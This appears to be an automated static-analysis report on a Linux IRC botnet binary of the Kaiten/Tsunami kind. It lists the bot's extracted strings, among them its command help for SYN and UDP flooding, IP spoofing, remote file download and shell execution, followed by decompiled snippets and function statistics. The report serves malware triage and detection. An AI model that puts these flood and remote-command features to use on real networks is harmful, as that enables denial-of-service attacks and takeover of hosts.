=============================================================================
========	BINARY ID :30507817fd44b7a2652d0e696df2eed2e9e4609e==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :700
SUPSCPECTED LINES COUNT :97
SUPSCPECTED STRINGS COUNT (DISTINCT) :24
SUPSCPECTED STRINGS WEIGHT :88
SUSPECT STRING SCORE : [88 / 150] 58%
USER AGENTS STRINGS COUNT :1
STATIC IPs STRINGS COUNT :0
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
NOTICE %s :Unable to comply.\n
/usr/dict/words
NOTICE %s :GET <host> <save as>\n
NOTICE %s :Unable to create socket.\n
http://
NOTICE %s :Unable to resolve address.\n
NOTICE %s :Unable to connect to http.\n
GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n
NOTICE %s :Receiving file.\n
NOTICE %s :Saved as %s\n
NOTICE %s :Spoofs: %d.%d.%d.%d\n
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n
NOTICE %s :Kaiten wa goraku\n
NOTICE %s :NICK <nick>\n
NOTICE %s :Nick cannot be larger than 9 characters.\n
NOTICE %s :DISABLE <pass>\n
NOTICE %s :Current status is: %s.\n
NOTICE %s :Already disabled.\n
NOTICE %s :Password too long! > 254\n
NOTICE %s :Disable sucessful.\n
NOTICE %s :ENABLE <pass>\n
NOTICE %s :Already enabled.\n
NOTICE %s :Wrong password\n
NOTICE %s :Password correct.\n
NOTICE %s :Removed all spoofs\n
NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n
NOTICE %s :Unable to resolve %s\n
NOTICE %s :UDP <target> <port> <secs>\n
NOTICE %s :Packeting %s.\n
NOTICE %s :PAN <target> <port> <secs>\n
NOTICE %s :Panning %s.\n
NOTICE %s :TSUNAMI <target> <secs>\n
NOTICE %s :Tsunami heading for %s.\n
NOTICE %s :UNKNOWN <target> <secs>\n
NOTICE %s :Unknowning %s.\n
NOTICE %s :MOVE <server>\n
NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls\n
NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers\n
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder\n
NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder\n
NOTICE %s :NICK <nick>                                      = Changes the nick of the client\n
NOTICE %s :SERVER <server>                                  = Changes servers\n
NOTICE %s :GETSPOOFS                                        = Gets the current spoofing\n
NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet\n
NOTICE %s :DISABLE                                          = Disables all packeting from this client\n
NOTICE %s :ENABLE                                           = Enables all packeting from this client\n
NOTICE %s :KILL                                             = Kills the client\n
NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd\n
NOTICE %s :VERSION                                          = Requests version of client\n
NOTICE %s :KILLALL                                          = Kills all current packeting\n
NOTICE %s :HELP                                             = Displays this\n
NOTICE %s :IRC <command>                                    = Sends this command to the server\n
NOTICE %s :SH <command>                                     = Executes a command\n
NOTICE %s :Killing pid %d.\n
GETSPOOFS
SPOOFS
KILL
KILLALL
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s\n
NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n
PRIVMSG
PING
NICK %s\nUSER %s localhost localhost :%s\n
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
/bin/sh
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
/etc/hosts
/etc/config/hosts
^8PSh
PPSh
^8PSh
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
NOTICE %s :Spoofs: %d.%d.%d.%d\n
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 45570
+++TOTAL FUNCTIONS 			:218
+++LINES PER FUNCTION RATIO 	: 209.036697247706
+++SUSPECTED LINES COUNT 	: 351
+++SUSPECTED LINES RATIO 	: 0.770243581303489
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 45570
+++WHILE (TRUE) LINES			: 11523
+++WHILE (TRUE) LINES RATION		:25.2863726135616%
+++WHILE (TRUE) LOOPS COUNT		: 86
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
    int32_t v115 = function_804b90c((int32_t)"/usr/dict/words", (int32_t)&v114); // 0x8048554
                    function_804ec94((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                function_804ec94((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
                function_804ec94((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
            function_804ec94((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    if (function_804f6b0("/dev/null", v111, v110) != v107) {
    int32_t v108 = function_804b90c((int32_t)"/etc/resolv.conf", (int32_t)&v107); // 0x8050d2d
        int32_t v121 = function_804b90c((int32_t)"/etc/config/resolv.conf", (int32_t)&v107); // 0x8050d4b
    int32_t v107 = function_804b90c((int32_t)"/etc/hosts", (int32_t)&v106); // 0x8051c55
        result = function_804b90c((int32_t)"/etc/config/hosts", (int32_t)&v106);
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
        result = function_80482b3(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n");

        result = function_80482b3(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d\n");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_804ee8c                                  |1   |889     |133           |0           |
----------------------------------------------------------------------------------------------
function_804fcd0                                  |0   |3502    |50            |3266        |
----------------------------------------------------------------------------------------------
function_804c885                                  |1   |1013    |20            |881         |
----------------------------------------------------------------------------------------------
function_8048a25                                  |4   |411     |13            |263         |
----------------------------------------------------------------------------------------------
function_8051c79                                  |9   |630     |12            |289         |
----------------------------------------------------------------------------------------------
function_8050ce4                                  |0   |495     |11            |253         |
----------------------------------------------------------------------------------------------
function_804daaa                                  |1   |3448    |7             |2111        |
----------------------------------------------------------------------------------------------
function_804ab32                                  |2   |287     |7             |178         |
----------------------------------------------------------------------------------------------
function_80503c8                                  |3   |285     |6             |124         |
----------------------------------------------------------------------------------------------
function_804ba10                                  |1   |236     |4             |76          |
----------------------------------------------------------------------------------------------
function_804eb08                                  |4   |462     |4             |101         |
----------------------------------------------------------------------------------------------
function_8049339                                  |4   |209     |3             |66          |
----------------------------------------------------------------------------------------------
function_804e640                                  |0   |185     |3             |74          |
----------------------------------------------------------------------------------------------
function_80517ad                                  |4   |468     |3             |330         |
----------------------------------------------------------------------------------------------
function_80514d2                                  |4   |392     |3             |239         |
----------------------------------------------------------------------------------------------
function_804ed00                                  |1   |209     |2             |94          |
----------------------------------------------------------------------------------------------
function_80520b0                                  |4   |198     |2             |66          |
----------------------------------------------------------------------------------------------
function_804bf86                                  |0   |160     |2             |31          |
----------------------------------------------------------------------------------------------
function_804ae34                                  |0   |233     |2             |121         |
----------------------------------------------------------------------------------------------
function_80513b4                                  |4   |202     |2             |25          |
----------------------------------------------------------------------------------------------
function_804e2d9                                  |1   |255     |2             |122         |
----------------------------------------------------------------------------------------------
function_80495af                                  |4   |188     |2             |39          |
----------------------------------------------------------------------------------------------
function_8050590                                  |6   |1152    |2             |855         |
----------------------------------------------------------------------------------------------
function_804985f                                  |4   |195     |2             |43          |
----------------------------------------------------------------------------------------------
function_804fc00                                  |5   |216     |2             |41          |
----------------------------------------------------------------------------------------------
function_8049c58                                  |10  |182     |2             |35          |
----------------------------------------------------------------------------------------------
function_804f954                                  |4   |184     |2             |68          |
----------------------------------------------------------------------------------------------
function_8051418                                  |4   |164     |2             |45          |
----------------------------------------------------------------------------------------------
function_80504fc                                  |2   |214     |2             |94          |
----------------------------------------------------------------------------------------------
function_8048f4f                                  |2   |120     |2             |0           |
----------------------------------------------------------------------------------------------
function_804f794                                  |4   |146     |2             |0           |
----------------------------------------------------------------------------------------------
function_80504d4                                  |4   |171     |2             |49          |
----------------------------------------------------------------------------------------------
function_8051c48                                  |0   |119     |2             |0           |
----------------------------------------------------------------------------------------------
function_804c0dc                                  |3   |756     |2             |628         |
----------------------------------------------------------------------------------------------
function_804d490                                  |1   |275     |2             |163         |
----------------------------------------------------------------------------------------------
function_804f898                                  |5   |235     |2             |47          |
----------------------------------------------------------------------------------------------
function_804f08b                                  |8   |666     |1             |18          |
----------------------------------------------------------------------------------------------
function_804f7ec                                  |5   |120     |1             |0           |
----------------------------------------------------------------------------------------------
function_8051364                                  |4   |135     |1             |20          |
----------------------------------------------------------------------------------------------
function_804b6dc                                  |2   |120     |1             |0           |
----------------------------------------------------------------------------------------------
function_804aaaa                                  |1   |110     |1             |0           |
----------------------------------------------------------------------------------------------
function_804b64c                                  |0   |121     |1             |0           |
----------------------------------------------------------------------------------------------
function_804cda0                                  |0   |178     |1             |37          |
----------------------------------------------------------------------------------------------
function_804cfd4                                  |4   |187     |1             |60          |
----------------------------------------------------------------------------------------------
function_804d240                                  |0   |138     |1             |18          |
----------------------------------------------------------------------------------------------
function_804d218                                  |3   |138     |1             |18          |
----------------------------------------------------------------------------------------------
function_805144c                                  |3   |188     |1             |55          |
----------------------------------------------------------------------------------------------
function_804b624                                  |0   |121     |1             |0           |
----------------------------------------------------------------------------------------------
function_804d34c                                  |2   |139     |1             |28          |
----------------------------------------------------------------------------------------------
function_804e993                                  |2   |183     |1             |38          |
----------------------------------------------------------------------------------------------
function_804f6b0                                  |3   |125     |1             |0           |
----------------------------------------------------------------------------------------------
function_804c748                                  |1   |272     |1             |81          |
----------------------------------------------------------------------------------------------
function_8052020                                  |7   |185     |1             |47          |
----------------------------------------------------------------------------------------------
function_804f334                                  |0   |110     |1             |0           |
----------------------------------------------------------------------------------------------
function_805218c                                  |2   |150     |1             |22          |
----------------------------------------------------------------------------------------------
function_80486dd                                  |0   |332     |1             |19          |
----------------------------------------------------------------------------------------------
function_804c694                                  |2   |168     |1             |35          |
----------------------------------------------------------------------------------------------
function_804ce84                                  |1   |213     |1             |58          |
----------------------------------------------------------------------------------------------
function_804ad9b                                  |2   |153     |1             |43          |
----------------------------------------------------------------------------------------------
function_8052000                                  |4   |134     |1             |19          |
----------------------------------------------------------------------------------------------
function_805169c                                  |3   |179     |1             |31          |
----------------------------------------------------------------------------------------------
function_8051384                                  |0   |145     |1             |18          |
----------------------------------------------------------------------------------------------
function_804f498                                  |5   |120     |1             |0           |
----------------------------------------------------------------------------------------------
function_8048455                                  |1   |130     |1             |20          |
----------------------------------------------------------------------------------------------
function_804b5f4                                  |1   |120     |1             |0           |
----------------------------------------------------------------------------------------------
function_804c03c                                  |0   |140     |1             |21          |
----------------------------------------------------------------------------------------------
function_8051fa8                                  |4   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f470                                  |1   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804ab10                                  |2   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d040                                  |2   |298     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f9d4                                  |4   |188     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d1e8                                  |2   |124     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b924                                  |3   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d1a8                                  |3   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f04b                                  |0   |119     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051b4c                                  |0   |143     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f588                                  |0   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f5d8                                  |0   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050478                                  |3   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b7fc                                  |1   |155     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f878                                  |0   |113     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049520                                  |2   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d5c8                                  |8   |534     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f67c                                  |5   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f5ec                                  |2   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804bcc8                                  |4   |910     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |114     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b750                                  |1   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804bace                                  |2   |308     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f828                                  |0   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d9d8                                  |6   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b90c                                  |2   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051f50                                  |4   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b79c                                  |3   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d570                                  |1   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f830                                  |0   |129     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d27c                                  |3   |254     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d3d8                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b780                                  |4   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b7d4                                  |1   |119     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e61d                                  |1   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b960                                  |4   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051adc                                  |0   |134     |0             |0           |
----------------------------------------------------------------------------------------------
function_80489a9                                  |2   |155     |0             |0           |
----------------------------------------------------------------------------------------------
function_80510bc                                  |4   |190     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051050                                  |0   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d384                                  |1   |118     |0             |0           |
----------------------------------------------------------------------------------------------
function_804fac0                                  |4   |247     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f34c                                  |8   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e801                                  |3   |115     |0             |0           |
----------------------------------------------------------------------------------------------
function_804909c                                  |4   |130     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d0fc                                  |0   |113     |0             |0           |
----------------------------------------------------------------------------------------------
function_804ec94                                  |5   |135     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d598                                  |1   |112     |0             |0           |
----------------------------------------------------------------------------------------------
function_8052204                                  |0   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_80480c0                                  |0   |140     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050f28                                  |7   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_80521d0                                  |0   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e7a4                                  |1   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804c704                                  |4   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_8048110                                  |0   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050f54                                  |0   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e89c                                  |2   |136     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f6fb                                  |2   |109     |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |1   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_80511a4                                  |3   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_804efd4                                  |0   |150     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d954                                  |3   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051018                                  |1   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804eaec                                  |3   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d25c                                  |0   |113     |0             |0           |
----------------------------------------------------------------------------------------------
function_8048311                                  |1   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f5b0                                  |0   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050358                                  |3   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_8048094                                  |0   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f368                                  |2   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804cc54                                  |1   |126     |0             |0           |
----------------------------------------------------------------------------------------------
function_804ad7c                                  |0   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e935                                  |2   |130     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f434                                  |5   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f016                                  |2   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804ead8                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e24c                                  |0   |150     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b69c                                  |3   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051a30                                  |0   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804818c                                  |2   |175     |0             |0           |
----------------------------------------------------------------------------------------------
function_80483ee                                  |0   |130     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050f88                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d9a4                                  |4   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f39c                                  |4   |131     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049250                                  |4   |139     |0             |0           |
----------------------------------------------------------------------------------------------
function_804ec2c                                  |1   |122     |0             |0           |
----------------------------------------------------------------------------------------------
function_804c85c                                  |1   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d980                                  |2   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804da84                                  |0   |128     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f3f4                                  |4   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_8048965                                  |2   |124     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d1d0                                  |3   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050fe4                                  |2   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d468                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051fe0                                  |1   |119     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d928                                  |3   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_8048120                                  |0   |122     |0             |0           |
----------------------------------------------------------------------------------------------
function_8049128                                  |4   |141     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f257                                  |4   |143     |0             |0           |
----------------------------------------------------------------------------------------------
function_804ea2d                                  |4   |147     |0             |0           |
----------------------------------------------------------------------------------------------
function_80480b0                                  |1   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d8fc                                  |3   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f620                                  |0   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804c010                                  |1   |121     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f013                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051004                                  |0   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_80503a4                                  |4   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b940                                  |3   |110     |0             |0           |
----------------------------------------------------------------------------------------------
function_804fb68                                  |0   |161     |0             |0           |
----------------------------------------------------------------------------------------------
function_80511f4                                  |4   |320     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f017                                  |0   |125     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d3f8                                  |2   |123     |0             |0           |
----------------------------------------------------------------------------------------------
function_804da58                                  |3   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f560                                  |0   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051b30                                  |0   |112     |0             |0           |
----------------------------------------------------------------------------------------------
function_80510a0                                  |4   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_80512c0                                  |4   |182     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051330                                  |4   |122     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f648                                  |4   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f714                                  |1   |123     |0             |0           |
----------------------------------------------------------------------------------------------
function_805037c                                  |2   |121     |0             |0           |
----------------------------------------------------------------------------------------------
function_804fbc0                                  |0   |138     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051068                                  |0   |124     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b710                                  |5   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e858                                  |1   |114     |0             |0           |
----------------------------------------------------------------------------------------------
function_804bf0c                                  |0   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_804907a                                  |2   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804c072                                  |4   |140     |0             |0           |
----------------------------------------------------------------------------------------------
function_804b7f4                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f920                                  |4   |121     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051298                                  |1   |111     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f538                                  |0   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f744                                  |1   |161     |0             |0           |
----------------------------------------------------------------------------------------------
function_804cca8                                  |3   |130     |0             |0           |
----------------------------------------------------------------------------------------------
function_804cd0c                                  |2   |151     |0             |0           |
----------------------------------------------------------------------------------------------
function_804da1c                                  |5   |108     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d334                                  |3   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050fc4                                  |4   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e481                                  |1   |306     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d475                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_80484c9                                  |0   |171     |0             |0           |
----------------------------------------------------------------------------------------------
function_8050fa0                                  |4   |119     |0             |0           |
----------------------------------------------------------------------------------------------
function_80482b3                                  |2   |112     |0             |0           |
----------------------------------------------------------------------------------------------
function_8051980                                  |0   |119     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f4cc                                  |4   |120     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d204                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_805027c                                  |0   |257     |0             |0           |
----------------------------------------------------------------------------------------------
function_804f500                                  |1   |127     |0             |0           |
----------------------------------------------------------------------------------------------
function_804e754                                  |1   |116     |0             |0           |
----------------------------------------------------------------------------------------------
function_804bf6f                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d489                                  |1   |109     |0             |0           |
----------------------------------------------------------------------------------------------
function_804d130                                  |4   |162     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_804ee8c ===================
++++++++ FUNCTION START 24656
++++++++ FUNCTION END 25545
++++++++ FUNCTION LENGTH 889
        case 0: {
        case 1: {
        case 2: {
        case 3: {
        case 4: {
        case 5: {
        case 6: {
        case 7: {
        case 8: {
        case 9: {
        case 10: {
        case 11: {
        case 12: {
        case 13: {
        case 14: {
        case 15: {
        case 16: {
        case 17: {
        case 18: {
        case 19: {
        case 20: {
        case 21: {
        case 22: {
        case 23: {
        case 24: {
        case 25: {
        case 26: {
        case 27: {
        case 28: {
        case 29: {
        case 30: {
        case 31: {
        case 32: {
        case 33: {
        case 34: {
        case 35: {
        case 36: {
        case 37: {
        case 38: {
        case 39: {
        case 40: {
        case 41: {
        case 42: {
        case 43: {
        case 44: {
        case 45: {
        case 46: {
        case 47: {
        case 48: {
        case 49: {
        case 50: {
        case 51: {
        case 52: {
        case 53: {
        case 54: {
        case 55: {
        case 56: {
        case 57: {
        case 58: {
        case 59: {
        case 60: {
        case 61: {
        case 62: {
        case 63: {
        case 64: {
        case 65: {
        case 66: {
        case 67: {
        case 68: {
        case 69: {
        case 70: {
        case 71: {
        case 72: {
        case 73: {
        case 74: {
        case 75: {
        case 76: {
        case 77: {
        case 78: {
        case 79: {
        case 80: {
        case 81: {
        case 82: {
        case 83: {
        case 84: {
        case 85: {
        case 86: {
        case 87: {
        case 88: {
        case 89: {
        case 90: {
        case 91: {
        case 92: {
        case 93: {
        case 94: {
        case 95: {
        case 96: {
        case 97: {
        case 98: {
        case 99: {
        case 100: {
        case 101: {
        case 102: {
        case 103: {
        case 104: {
        case 105: {
        case 106: {
        case 107: {
        case 108: {
        case 109: {
        case 110: {
        case 111: {
        case 112: {
        case 113: {
        case 114: {
        case 115: {
        case 116: {
        case 117: {
        case 118: {
        case 119: {
        case 120: {
        case 121: {
        case 122: {
        case 123: {
        case 124: {
        case 125: {
        case 126: {
        case 127: {
        case 128: {
        case 129: {
        case 130: {
        case 131: {
        case 149: {
=================FUNCTION : function_804fcd0 ===================
++++++++ FUNCTION START 31983
++++++++ FUNCTION END 35485
++++++++ FUNCTION LENGTH 3502
                    while (true) {
                        while (true) {
                                        while (true) {
                                                                                while (true) {
                                                                                                while (true) {
                                                                                            while (true) {
                                                                                while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                        while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                    while (true) {
                                                                    while (true) {
                                                                while (true) {
                                                                        while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                while (true) {
                                                                while (true) {
                                                            while (true) {
                                                                                    while (true) {
                                                                                    while (true) {
                                                                                while (true) {
                                                                            while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                            while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                        while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                            while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                    while (true) {
                                                                        while (true) {
                                                                while (true) {
                                                                    while (true) {
                                                            while (true) {
                                                                while (true) {
                                                        while (true) {
                                    while (true) {
            while (true) {
                                    while (true) {
        while (true) {
=================FUNCTION : function_804c885 ===================
++++++++ FUNCTION START 11187
++++++++ FUNCTION END 12200
++++++++ FUNCTION LENGTH 1013
        while (true) {
                while (true) {
                    while (true) {
                        while (true) {
                                                while (true) {
                                                    while (true) {
                                                        while (true) {
                                                                        while (true) {
                                                                                while (true) {
                                                                                            while (true) {
                                                                                    while (true) {
                                                                    while (true) {
                                                                            while (true) {
                                                                                        while (true) {
                                                                                    while (true) {
                                                        while (true) {
                                                                while (true) {
                                                                            while (true) {
                                                                        while (true) {
    while (true) {
=================FUNCTION : function_8048a25 ===================
++++++++ FUNCTION START 2521
++++++++ FUNCTION END 2932
++++++++ FUNCTION LENGTH 411
        function_80482b3(a1, (int32_t)"NOTICE %s :GET <host> <save as>\n");
        function_80482b3(a1, (int32_t)"NOTICE %s :Unable to create socket.\n");
    int32_t v113 = ((int32_t)(v111 | _strncmp((char *)v110, "http://", 7) % 2 == 0) | v112 & -256) ^ 1; // 0x8048af1
    while (true) {
            function_80482b3(a1, (int32_t)"NOTICE %s :Unable to connect to http.\n");
        function_80482b3(v108, (int32_t)"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
            while (true) {
                while (true) {
                            while (true) {
                            while (true) {
                                while (true) {
                        while (true) {
            while (true) {
=================FUNCTION : function_8051c79 ===================
++++++++ FUNCTION START 43607
++++++++ FUNCTION END 44237
